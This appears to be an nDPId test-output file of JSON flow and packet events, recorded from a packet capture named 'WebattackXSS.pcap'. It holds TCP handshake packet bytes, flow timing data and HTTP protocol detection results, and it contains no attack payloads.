-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347868358,"flow_last_seen":1499347868358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347868358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1499347868358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347868358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8189AAD4G7gCsEAABwKgKMoMEAFA06oCxAAAAAKACchDNWQAAAgQFtAQCCAoBPFd+AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7492,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":2,"flow_last_seen":1499347868358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347868358,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgwSCLK7WNOqAsqAScSBwXAAAAgQFtAQCCAoD5ijzATxXfgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7493,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":3,"flow_last_seen":1499347868359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347868359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA019BAAD4G7gesEAABwKgKMoMEAFA06oCygiyu14AQAOUPZAAAAQEICgE8V34D5ijz"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7503,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347869628,"flow_last_seen":1499347869628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347869628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7503,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1499347869628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347869628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XbNAAD4GaB2sEAABwKgKMoMSAFAbjgUPAAAAAKACchBhDAAAAgQFtAQCCAoBPFi8AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7504,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":2,"flow_last_seen":1499347869628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347869628,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgxKd9DBxG44FEKAScSBlbwAAAgQFtAQCCAoD5iowATxYvAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7505,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":3,"flow_last_seen":1499347869629,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347869629,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XbRAAD4GaCSsEAABwKgKMoMSAFAbjgUQnfQwcoAQAOUEdwAAAQEICgE8WLwD5iow"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347872187,"flow_last_seen":1499347872187,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347872187,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1499347872187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347872187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ycVAAD4G\/AqsEAABwKgKMoMsAFDCtZL+AAAAAKACchApXAAAAgQFtAQCCAoBPFs7AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":2,"flow_last_seen":1499347872187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347872187,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgyztIpfbwrWS\/6AScSB0pgAAAgQFtAQCCAoD5iywATxbOwEDAwc="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":3,"flow_last_seen":1499347872188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347872188,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ycZAAD4G\/BGsEAABwKgKMoMsAFDCtZL\/7SKX3IAQAOUTrQAAAQEICgE8WzwD5iyw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7533,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347873465,"flow_last_seen":1499347873465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347873465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33594,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7533,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1499347873465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347873465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+eFAAD4Gy+6sEAABwKgKMoM6AFCd+qWaAAAAAKACchA6LQAAAgQFtAQCCAoBPFx7AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7534,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":2,"flow_last_seen":1499347873465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347873465,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgzpjWOt2nfqlm6AScSC6ZwAAAgQFtAQCCAoD5i3vATxcewEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7536,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":3,"flow_last_seen":1499347873466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347873466,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+eJAAD4Gy\/WsEAABwKgKMoM6AFCd+qWbY1jrd4AQAOVZbwAAAQEICgE8XHsD5i3v"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347874737,"flow_last_seen":1499347874737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874737,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1499347874737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347874737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88wxAAD4G0sOsEAABwKgKMoNIAFDgx661AAAAAKACchDs+AAAAgQFtAQCCAoBPF25AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":2,"flow_last_seen":1499347874737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347874737,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg0iSQssc4MeutqAScSBdZQAAAgQFtAQCCAoD5i8tATxduQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7547,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":3,"flow_last_seen":1499347874738,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347874738,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08w1AAD4G0sqsEAABwKgKMoNIAFDgx662kkLLHYAQAOX8bAAAAQEICgE8XbkD5i8t"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347747187,"flow_last_seen":1499347752826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347747187,"flow_last_seen":1499347752826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347748472,"flow_last_seen":1499347753827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347748472,"flow_last_seen":1499347753827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347749751,"flow_last_seen":1499347754827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347749751,"flow_last_seen":1499347754827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347752308,"flow_last_seen":1499347757828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347752308,"flow_last_seen":1499347757828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347753649,"flow_last_seen":1499347758828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60572,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347753649,"flow_last_seen":1499347758828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7563,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347872187,"flow_last_seen":1499347877028,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347877028,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347877292,"flow_last_seen":1499347877292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347877292,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1499347877292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347877292,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8t4hAAD4GDkisEAABwKgKMoNiAFCEB9ewAAAAAKACchAeJQAAAgQFtAQCCAoBPGA4AAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":2,"flow_last_seen":1499347877292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347877292,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg2I\/o2nZhAfXsaAScSA\/9QAAAgQFtAQCCAoD5jGsATxgOAEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":3,"flow_last_seen":1499347877293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347877293,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0t4lAAD4GDk+sEAABwKgKMoNiAFCEB9exP6Np2oAQAOXe\/AAAAQEICgE8YDgD5jGs"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347878568,"flow_last_seen":1499347878568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347878568,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33648,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1499347878568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347878568,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UNxAAD4GdPSsEAABwKgKMoNwAFDv6DGrAAAAAKACchBW\/AAAAgQFtAQCCAoBPGF3AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7577,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":2,"flow_last_seen":1499347878568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347878568,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg3Dm1iqC7+gxrKAScSAPsQAAAgQFtAQCCAoD5jLrATxhdwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7578,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":3,"flow_last_seen":1499347878568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347878568,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UN1AAD4GdPusEAABwKgKMoNwAFDv6DGs5tYqg4AQAOWuuAAAAQEICgE8YXcD5jLr"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347881141,"flow_last_seen":1499347881141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347881141,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1499347881141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347881141,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80HhAAD4G9VesEAABwKgKMoOKAFDzHbOCAAAAAKACchDPUgAAAgQFtAQCCAoBPGP6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7598,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":2,"flow_last_seen":1499347881141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347881141,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg4pPHZMl8x2zg6AScSC0mgAAAgQFtAQCCAoD5jVuATxj+gEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":3,"flow_last_seen":1499347881142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347881142,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00HlAAD4G9V6sEAABwKgKMoOKAFDzHbODTx2TJoAQAOVTogAAAQEICgE8Y\/oD5jVu"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347882404,"flow_last_seen":1499347882404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347882404,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1499347882404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347882404,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eWdAAD4GTGmsEAABwKgKMoOYAFA4phxRAAAAAKACchAfsgAAAgQFtAQCCAoBPGU2AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":2,"flow_last_seen":1499347882404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347882404,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg5hCgWTIOKYcUqAScSA+twAAAgQFtAQCCAoD5jaqATxlNgEDAwc="} 
